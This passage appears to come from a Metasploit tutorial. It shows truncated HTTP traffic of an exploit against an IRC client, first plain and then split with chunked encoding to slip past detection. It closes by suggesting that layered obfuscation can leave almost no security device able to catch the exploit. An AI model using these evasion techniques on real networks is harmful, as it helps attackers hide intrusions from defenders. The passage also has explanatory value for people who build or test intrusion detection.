To demonstrate the effect that evasion options can have on the network traffic generated by Metasploit, here is an attack against an IRC client before and after the HTTP::chunked evasion technique is enabled. Here is the exploit before evasion:
GET /exploit HTTP/1.0 HTTP/1.1 200 OK Server: Apache Content-Type: text/html Content-Length: 1692 Connection: close <html><iframe src='irc://X891KNFNSPeazXbVVREh50zlxXVzYPqcWB9V8tp6QGcf4UyBJwNee3d 9fY8XNVqmt07MldpXwNuWAiKjscA2JjXFZt3SariVrl2eGDCNQP1GrNHutrkZNilRKruhjN0Mkqe83mq plnmgWkV4Ra5i0UP0AAc0UZ4RXwfrqt1CvL2edWz9Ud7x653yFTDhhTtO4p6CWsf0gZhaVYhINCeWKSS 0f6sOnJz8O48lyzD1cdBKRezto996FLPVRvnTlTR5z7BqI5GsXcGIn6fnvDJg2u1Vv58L9J6U8u8QxiA wFG5uaZGG8rkFpo9MzKQrqpqjkkIUlIlM [continues...]
Here is the same exploit, this time using HTTP chunked encoding to transfer the exploit:
GET /exploit HTTP/1.0 HTTP/1.1 200 OK Transfer-Encoding: chunked Server: Apache Content-Type: text/html Connection: close 2 <h 8 tml><ifr 2 am 5 e src 5 ='irc 4 ://u 3 PK1 5 N7ggF 4 JL0z 2 e6 8
Even though the exploit works equally well against the web browser (and IRC client), any security device monitoring your network traffic is much less likely to detect the second attack, which uses the chunked encoding. By combining a variety of evasion techniques (such as JavaScript obfuscation, Unicode encoding, and GZIP compression), you can reduce the list of devices capable of detecting your exploit to nearly zero.